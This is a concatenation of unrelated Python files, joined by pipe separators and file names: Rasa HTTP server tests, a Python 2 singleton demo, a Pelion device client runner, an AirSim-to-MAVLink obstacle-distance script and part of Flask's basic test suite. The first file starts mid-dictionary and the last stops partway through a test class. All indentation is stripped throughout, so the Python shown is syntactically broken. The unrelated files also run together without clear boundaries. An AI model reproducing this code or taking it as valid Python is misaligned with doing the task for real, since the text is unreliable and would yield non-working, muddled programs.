"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 403
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
def test_list_routes(default_agent: Agent):
from rasa import server
app = server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
def test_unload_model_error(rasa_app: SanicTestClient):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "model_file" in response.json and response.json["model_file"] is not None
_, response = rasa_app.delete("/model")
assert response.status == 204
def test_get_domain(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain", headers={"accept": "application/json"})
content = response.json
assert response.status == 200
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
def test_get_domain_invalid_accept_header(rasa_app: SanicTestClient):
_, response = rasa_app.get("/domain")
assert response.status == 406
def test_load_model(rasa_app: SanicTestClient, trained_core_model):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
data = {"model_file": trained_core_model}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
def test_load_model_from_model_server(rasa_app: SanicTestClient, trained_core_model):
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
old_fingerprint = response.json["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = rasa_app.put("/model", json=data)
assert response.status == 204
_, response = rasa_app.get("/status")
assert response.status == 200
assert "fingerprint" in response.json
assert old_fingerprint != response.json["fingerprint"]
import rasa.core.jobs
rasa.core.jobs.__scheduler = None
def test_load_model_invalid_request_body(rasa_app: SanicTestClient):
_, response = rasa_app.put("/model")
assert response.status == 400
def test_load_model_invalid_configuration(rasa_app: SanicTestClient):
data = {"model_file": "some-random-path"}
_, response = rasa_app.put("/model", json=data)
assert response.status == 400
def test_execute(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "test_execute")
data = {"name": "utter_greet"}
_, response = rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_execute_with_missing_action_name(rasa_app: SanicTestClient):
test_sender = "test_execute_with_missing_action_name"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 400
def test_execute_with_not_existing_action(rasa_app: SanicTestClient):
test_sender = "test_execute_with_not_existing_action"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(f"/conversations/{test_sender}/execute", json=data)
assert response.status == 500
def test_trigger_intent(rasa_app: SanicTestClient):
data = {"name": "greet"}
_, response = rasa_app.post("/conversations/test_trigger/trigger_intent", json=data)
assert response.status == 200
parsed_content = response.json
assert parsed_content["tracker"]
assert parsed_content["messages"]
def test_trigger_intent_with_missing_intent_name(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 400
def test_trigger_intent_with_not_existing_intent(rasa_app: SanicTestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
_create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == 404
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
([RestInput(), SlackInput("test")], "slack", SlackBot),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
|
singleton.py | import time
import threading
# 打印缓冲区锁
# print buffer lock
print_lock = threading.Lock()
class Singleton():
_instance_lock = threading.Lock()
def __init__(self):
time.sleep(1)
pass
@classmethod
def instance(cls):
Singleton._instance_lock.acquire()
if not hasattr(Singleton, "_instance"):
Singleton._instance = Singleton()
Singleton._instance_lock.release()
return Singleton._instance
def task():
# 必须通过.instance()进行创建单例实例,直接Singleton创建的并不是单例模式
# you should create instance by "Single.instance()" instead of "Singleton()"
obj = Singleton.instance()
print_lock.acquire()
print obj
print_lock.release()
for i in range(10):
t = threading.Thread(target=task)
t.start() |
client_runner.py | """
Copyright 2019-2020 Pelion.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from copy import deepcopy
import logging
import queue
import threading
from time import time
import pelion_test_lib.tools.utils as utils
flog = logging.getLogger('ClientRunner')
flog.setLevel(logging.DEBUG)
fh = logging.FileHandler('client.log')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(threadName)s:%(levelname)s: %(message)s')
fh.setFormatter(formatter)
flog.addHandler(fh)
log = logging.getLogger(__name__)
class Client:
"""
Client runner class that handles communication for given dut object
:param dut: Running client object
:param trace: Log the raw client output
:param name: Logging name for the client
"""
def __init__(self, dut, trace=False, name='0'):
self._ep_id = None
self.name = name
self.trace = trace
self.run = True
self.iq = queue.Queue()
self.dut = dut
input_thread_name = '<-- D{}'.format(name)
it = threading.Thread(target=self._input_thread, name=input_thread_name)
it.setDaemon(True)
log.info('Starting runner threads for client "D{}"'.format(self.name))
it.start()
def _input_thread(self):
"""
Runner's input thread
"""
while self.run:
line = self.dut.readline()
if line:
plain_line = utils.strip_escape(line)
if b'\r' in line and line.count(b'\r') > 1:
plain_line = plain_line.split(b'\r')[-2]
plain_line = plain_line.replace(b'\t', b' ').decode('utf-8', 'replace')
flog.info('<--|D{}| {}'.format(self.name, plain_line.strip()))
if self.trace:
log.debug('Raw output: {}'.format(line))
if b'Error' in line:
log.error('Output: {}'.format(line))
self.iq.put(plain_line)
else:
pass
def _read_line(self, timeout):
"""
Read data from input queue
:param timeout: Timeout
:return: Data from queue
"""
return self.iq.get(timeout=timeout)
def clear_input(self):
"""
Clear input queue messages
"""
with self.iq.mutex:
self.iq.queue.clear()
def kill(self):
"""
Kill the client runner
"""
log.debug('Killing client "D{}" runner...'.format(self.name))
self.run = False
def reset(self):
"""
Send reset to client
"""
self.dut.reset()
def endpoint_id(self, wait_for_response=10):
"""
Get endpoint id from client
:param wait_for_response: Timeout waiting the response
:return: Endpoint id
"""
if self._ep_id is None:
ep_id = self.wait_for_output('Device Id:', wait_for_response)
if ep_id is not None:
ep_array = ep_id.split()
if len(ep_array) > 1:
self._ep_id = ep_array[2]
return self._ep_id
def wait_for_output(self, search, timeout=60, assert_errors=True, ignore_case=True, errors=None):
"""
Wait for expected output response
:param search: Expected response string
:param timeout: Response waiting time
:param assert_errors: Assert on error situations
:param ignore_case: Ignore client output's casing
:param errors: String(s) that should cause error
:return: Response line with expected string or None if either line containing
one of the errors strings was found or timeout was reached (and assert_errors was False)
"""
if errors is None:
errors = []
elif isinstance(errors, str):
errors = [errors]
if ignore_case:
search = search.lower()
errors = deepcopy(errors)
for i, error in enumerate(errors):
errors[i] = error.lower()
return self._do_wait_for_output(search, errors, timeout, assert_errors, ignore_case)
def _do_wait_for_output(self, search, errors, timeout, assert_errors, ignore_case):
start = time()
now = 0
time_to_wait = timeout
timeout_error_msg = 'Didn\'t find {} in {} s'.format(search, time_to_wait)
while True:
try:
line = self._read_line(1)
if line:
if ignore_case:
line = line.lower()
if search in line:
end = time()
log.debug('Expected string "{}" found! [time][{:.4f} s]'.format(search, end - start))
return line
for error in errors:
if error in line:
end = time()
log.debug('Expected error string "{}" found! [time][{:.4f} s]'.format(error, end - start))
break
else:
continue
if assert_errors:
assert False, 'Error string found from line "{}"'.format(line)
else:
return None
else:
last = now
now = time()
if now - start >= timeout:
if assert_errors:
assert False, timeout_error_msg
else:
log.warning(timeout_error_msg)
break
if now - last > 1:
log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(search,
abs(now - start - timeout)))
except queue.Empty:
last = now
now = time()
if now - start >= timeout:
if assert_errors:
assert False, timeout_error_msg
else:
log.warning(timeout_error_msg)
break
if now - last > 1:
log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(search,
abs(now - start - timeout)))
|
air_sim_to_mavlink.py | # Install required packages:
#
# pip3 install pymavlink
# pip3 install apscheduler
# pip3 install opencv-python
# pip3 install airsim
# pip3 install numpy
# sudo apt-get install python-PIL
import math
import sys
import time
import airsim
from cv2 import cv2
import numpy as np
from PIL import Image
import threading
from time import sleep
from apscheduler.schedulers.background import BackgroundScheduler
from pymavlink import mavutil
import argparse
sys.path.append("/usr/local/lib/")
# Set MAVLink protocol to 2.
import os
os.environ["MAVLINK20"] = "1"
######################################################
## Parsing user' inputs ##
######################################################
parser = argparse.ArgumentParser(description='Reboots vehicle')
parser.add_argument('--connect',
help="Vehicle connection target string. If not specified, a default string will be used.")
parser.add_argument('--baudrate', type=float,
help="Vehicle connection baudrate. If not specified, a default value will be used.")
parser.add_argument('--obstacle_distance_msg_hz', type=float,
help="Update frequency for OBSTACLE_DISTANCE message. If not specified, a default value will be used.")
args = parser.parse_args()
# Default configurations for connection to the FCU
if not args.connect:
connection_string = 'localhost:14551'
else:
connection_string = args.connect
if not args.baudrate:
connection_baudrate = 921600
else:
connection_baudrate = args.baudrate
if not args.obstacle_distance_msg_hz:
obstacle_distance_msg_hz = 15
else:
obstacle_distance_msg_hz = args.obstacle_distance_msg_hz
# AirSim API
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
DEPTH_RANGE_M = [0.3, 12] # depth range, to be changed as per requirements
MAX_DEPTH = 9999 # arbitrary large number
#numpy array to share obstacle coordinates between main thread and mavlink thread
mavlink_obstacle_coordinates = np.ones((9,3), dtype = np.float) * (MAX_DEPTH)
# get time in correct format
start_time = int(round(time.time() * 1000))
current_milli_time = lambda: int(round(time.time() * 1000) - start_time)
# get depth from airsim backend
def get_depth(client):
requests = []
requests.append(airsim.ImageRequest(
'front_center', airsim.ImageType.DepthPlanner, pixels_as_float=True, compress=False))
responses = client.simGetImages(requests)
depth = airsim.list_to_2d_float_array(
responses[0].image_data_float, responses[0].width, responses[0].height)
depth = np.expand_dims(depth, axis=2)
depth = depth.squeeze()
return depth, responses[0].width, responses[0].height
# this method converts, (x,y) from depth matrix to NEU 3-D vector in body frame
def convert_depth_3D_vec(x_depth, y_depth, depth, fov):
# https://stackoverflow.com/questions/62046666/find-3d-coordinate-with-respect-to-the-camera-using-2d-image-coordinates
h, w = depth.shape
center_x = w // 2
center_y = h // 2
focal_len = w / (2 * np.tan(fov / 2))
x = depth[y_depth, x_depth]
y = (x_depth - center_x) * x / focal_len
z = -1 * (y_depth - center_y) * x / focal_len
return x,y,z
# divide the depth data into a 3x3 grid. Pick out the smallest distance in each grid
# store the x,y of the depth matrix, the 9 depths, and convert them into body-frame x,y,z
def distances_from_depth_image(depth_mat, min_depth_m, max_depth_m, depth, depth_coordinates, obstacle_coordinates, valid_depth):
# Parameters for depth image
depth_img_width = depth_mat.shape[1]
depth_img_height = depth_mat.shape[0]
# Parameters for obstacle distance message
step_x = depth_img_width / 20
step_y = depth_img_height/ 20
sampling_width = int(1/3 * depth_img_width)
sampling_height = int(1/3* depth_img_height)
# divide the frame into 3x3 grid to find the minimum depth value in "9 boxes"
for i in range(9):
if i%3 == 0 and i != 0:
sampling_width = int(1/3* depth_img_width)
sampling_height = sampling_height + int(1/3 * depth_img_height)
x,y = 0,0
x = sampling_width - int(1/3 * depth_img_width)
while x < sampling_width:
x = x + step_x
y = sampling_height - int(1/3* depth_img_height)
while y < sampling_height:
y = y + step_y
# make sure coordinates stay within matrix limits
x_pixel = 0 if x < 0 else depth_img_width-1 if x > depth_img_width -1 else int(x)
y_pixel = 0 if y < 0 else depth_img_height-1 if y > depth_img_height -1 else int(y)
#convert depth to body-frame x,y,z
x_obj,y_obj,z_obj = convert_depth_3D_vec(x_pixel, y_pixel, depth_mat, math.radians(90))
# actual euclidean distance to obstacle
point_depth = (x_obj*x_obj + y_obj*y_obj + z_obj*z_obj)**0.5
# if within valid range, mark this depth as valid and store all the info
if point_depth <= depth[i] and point_depth > min_depth_m and point_depth < max_depth_m:
depth[i] = point_depth
depth_coordinates[i] = [x_pixel,y_pixel]
obstacle_coordinates[i] = [x_obj, y_obj, z_obj]
valid_depth[i] = True
sampling_width = sampling_width + int(1/3* depth_img_width)
# display depth image from AirSim. The data received from AirSim needs to be proceeded for a good view
# also divides the view into 3x3 grid and prints smallest depth value in each grid
# puts a circle on the smallest found depth value
def getScreenDepthVis(client, depth_coordinates, depth_list):
#get image from airsim
responses = client.simGetImages([airsim.ImageRequest(0, airsim.ImageType.DepthPlanner, True, False)])
# condition the data
img1d = np.array(responses[0].image_data_float, dtype=np.float)
img1d = 255/np.maximum(np.ones(img1d.size), img1d)
img2d = np.reshape(img1d, (responses[0].height, responses[0].width))
image = np.invert(np.array(Image.fromarray(img2d.astype(np.uint8), mode='L')))
factor = 10
maxIntensity = 255.0 # depends on dtype of image data
# Decrease intensity such that dark pixels become much darker, bright pixels become slightly dark
newImage1 = (maxIntensity)*(image/maxIntensity)**factor
newImage1 = newImage1.astype(np.uint8)
color_img = cv2.applyColorMap(newImage1, cv2.COLORMAP_JET)
# divide view into 3x3 matrix
pxstep = int(newImage1.shape[1]/3)
pystep = int(newImage1.shape[0]/3)
gx = pxstep
gy = pystep
while gx < newImage1.shape[1]:
cv2.line(color_img, (gx, 0), (gx, newImage1.shape[0]), color=(0, 0, 0), thickness=1)
gx += pxstep
while gy < newImage1.shape[0]:
cv2.line(color_img, (0, gy), (newImage1.shape[1], gy), color=(0, 0, 0),thickness=1)
gy += pystep
# print circle, and depth values on the screen
for i in range(len(depth_list)):
if depth_list[i] <= DEPTH_RANGE_M[1]:
color_img = cv2.circle(color_img, (int(depth_coordinates[i][0]),int(depth_coordinates[i][1])), 5, (0, 0, 0), 5)
color_img = cv2.putText(color_img, str(round(depth_list[i],2)), (int(pxstep*(1/4 + i%3)),int(pystep*(1/3 + math.floor(i/3)))), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0,0,255), 2)
cv2.imshow("Depth Vis", color_img)
cv2.waitKey(1)
def mavlink_loop(conn, callbacks):
'''a main routine for a thread; reads data from a mavlink connection,
calling callbacks based on message type received.
'''
interesting_messages = list(callbacks.keys())
while True:
# send a heartbeat msg
conn.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_ONBOARD_CONTROLLER,
mavutil.mavlink.MAV_AUTOPILOT_GENERIC,
0,
0,
0)
m = conn.recv_match(type=interesting_messages, timeout=1, blocking=True)
if m is None:
continue
callbacks[m.get_type()](m)
# send mavlink message to SITL
def send_obstacle_distance_3D_message():
global conn
time = current_milli_time()
# print(mavlink_obstacle_coordinates)
for i in range(9):
conn.mav.obstacle_distance_3d_send(
time, # us Timestamp (UNIX time or time since system boot)
0, # not implemented in ArduPilot
0, # not implemented in ArduPilot
65535, # unknown ID of the object. We are not really detecting the type of obstacle
float(mavlink_obstacle_coordinates[i][0]), # X in NEU body frame
float(mavlink_obstacle_coordinates[i][1]), # Y in NEU body frame
float(mavlink_obstacle_coordinates[i][2]), # Z in NEU body frame
float(DEPTH_RANGE_M[0]), # min range of sensor
float(DEPTH_RANGE_M[1]) # max range of sensor
)
conn = mavutil.mavlink_connection(
device = str(connection_string),
autoreconnect = True,
source_system = 1,
source_component = 93,
baud=connection_baudrate,
force_connected=True,
)
mavlink_callbacks = {
}
mavlink_thread = threading.Thread(target=mavlink_loop, args=(conn, mavlink_callbacks))
mavlink_thread.start()
# Send MAVlink messages in the background at pre-determined frequencies
sched = BackgroundScheduler()
sched.add_job(send_obstacle_distance_3D_message, 'interval', seconds = 1/obstacle_distance_msg_hz)
sched.start()
# main loop
while True:
#depth image from airsim
depth_mat,width,height = get_depth(client)
# Will be populated with smallest depth in each grid
depth_list = np.ones((9,), dtype=np.float) * (DEPTH_RANGE_M[1] + 1)
# Valid depth in each grid will be marked True
valid_depth = np.ones((9,), dtype=np.bool) * False
# Matrix Coordinated of the smallest depth in each grid
depth_coordinates = np.ones((9,2), dtype=np.uint16) * (MAX_DEPTH)
# Body frame NEU XYZ coordinates of obstacles to be sent to vehicle
obstacle_coordinates = np.ones((9,3),dtype=np.float) * (MAX_DEPTH)
#get the obstacles
distances_from_depth_image(depth_mat, DEPTH_RANGE_M[0], DEPTH_RANGE_M[1], depth_list, depth_coordinates, obstacle_coordinates, valid_depth)
# if valid, populate mavlink array
for i in range(9):
if valid_depth[i]:
mavlink_obstacle_coordinates[i] = obstacle_coordinates[i]
else:
mavlink_obstacle_coordinates[i] = MAX_DEPTH
# visualize the data
getScreenDepthVis(client, depth_coordinates, depth_list)
|
basic.py | # -*- coding: utf-8 -*-
"""
flask.testsuite.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import re
import uuid
import flask
import pickle
import unittest
from datetime import datetime
from threading import Thread
from flask.testsuite import FlaskTestCase, emits_module_deprecation_warning
from flask._compat import text_type
from werkzeug.exceptions import BadRequest, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
class BasicFunctionalityTestCase(FlaskTestCase):
def test_options_work(self):
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
self.assert_equal(rv.data, b'')
def test_options_on_multiple_rules(self):
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT'])
def test_options_handling_disabled(self):
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(rv.status_code, 405)
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['OPTIONS'])
def test_request_dispatching(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
c = app.test_client()
self.assert_equal(c.get('/').data, b'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_false(rv.data) # head truncates
self.assert_equal(c.post('/more').data, b'POST')
self.assert_equal(c.get('/more').data, b'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_url_mapping(self):
app = flask.Flask(__name__)
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
c = app.test_client()
self.assert_equal(c.get('/').data, b'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_false(rv.data) # head truncates
self.assert_equal(c.post('/more').data, b'POST')
self.assert_equal(c.get('/more').data, b'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_werkzeug_routing(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
c = app.test_client()
self.assert_equal(c.get('/foo/').data, b'index')
self.assert_equal(c.get('/foo/bar').data, b'bar')
def test_endpoint_decorator(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
c = app.test_client()
self.assert_equal(c.get('/foo/').data, b'index')
self.assert_equal(c.get('/foo/bar').data, b'bar')
def test_session(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/set', methods=['POST'])
def set():
flask.session['value'] = flask.request.form['value']
return 'value set'
@app.route('/get')
def get():
return flask.session['value']
c = app.test_client()
self.assert_equal(c.post('/set', data={'value': '42'}).data, b'value set')
self.assert_equal(c.get('/get').data, b'42')
def test_session_using_server_name(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com/')
self.assert_in('domain=.example.com', rv.headers['set-cookie'].lower())
self.assert_in('httponly', rv.headers['set-cookie'].lower())
def test_session_using_server_name_and_port(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_in('domain=.example.com', rv.headers['set-cookie'].lower())
self.assert_in('httponly', rv.headers['set-cookie'].lower())
def test_session_using_server_name_port_and_path(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080',
APPLICATION_ROOT='/foo'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/foo')
self.assert_in('domain=example.com', rv.headers['set-cookie'].lower())
self.assert_in('path=/foo', rv.headers['set-cookie'].lower())
self.assert_in('httponly', rv.headers['set-cookie'].lower())
def test_session_using_application_root(self):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app = flask.Flask(__name__)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
SECRET_KEY='foo',
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_in('path=/bar', rv.headers['set-cookie'].lower())
def test_session_using_session_settings(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
self.assert_in('domain=.example.com', cookie)
self.assert_in('path=/', cookie)
self.assert_in('secure', cookie)
self.assert_not_in('httponly', cookie)
def test_missing_session(self):
app = flask.Flask(__name__)
def expect_exception(f, *args, **kwargs):
try:
f(*args, **kwargs)
except RuntimeError as e:
self.assert_true(e.args and 'session is unavailable' in e.args[0])
else:
self.assert_true(False, 'expected exception')
with app.test_request_context():
self.assert_true(flask.session.get('missing_key') is None)
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration(self):
permanent = True
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return text_type(flask.session.permanent)
client = app.test_client()
rv = client.get('/')
self.assert_in('set-cookie', rv.headers)
match = re.search(r'\bexpires=([^;]+)(?i)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
self.assert_equal(expires.year, expected.year)
self.assert_equal(expires.month, expected.month)
self.assert_equal(expires.day, expected.day)
rv = client.get('/test')
self.assert_equal(rv.data, b'True')
permanent = False
rv = app.test_client().get('/')
self.assert_in('set-cookie', rv.headers)
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
self.assert_true(match is None)
def test_session_stored_last(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
c = app.test_client()
self.assert_equal(c.get('/').data, b'None')
self.assert_equal(c.get('/').data, b'42')
def test_session_special_types(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.after_request
def modify_session(response):
flask.session['m'] = flask.Markup('Hello!')
flask.session['u'] = the_uuid
flask.session['dt'] = now
flask.session['t'] = (1, 2, 3)
return response
@app.route('/')
def dump_session_contents():
return pickle.dumps(dict(flask.session))
c = app.test_client()
c.get('/')
rv = pickle.loads(c.get('/').data)
self.assert_equal(rv['m'], flask.Markup('Hello!'))
self.assert_equal(type(rv['m']), flask.Markup)
self.assert_equal(rv['dt'], now)
self.assert_equal(rv['u'], the_uuid)
self.assert_equal(rv['t'], (1, 2, 3))
def test_flashes(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
with app.test_request_context():
self.assert_false(flask.session.modified)
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
self.assert_true(flask.session.modified)
self.assert_equal(list(flask.get_flashed_messages()), ['Zap', 'Zip'])
def test_extended_flashing(self):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
app = flask.Flask(__name__)
app.secret_key = 'testkey'
app.testing = True
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], u'Hello World')
self.assert_equal(messages[2], flask.Markup(u'<em>Testing</em>'))
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('error', u'Hello World'))
self.assert_equal(messages[2], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(category_filter=['message'], with_categories=True)
self.assert_equal(len(messages), 1)
self.assert_equal(messages[0], ('message', u'Hello World'))
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'], with_categories=True)
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
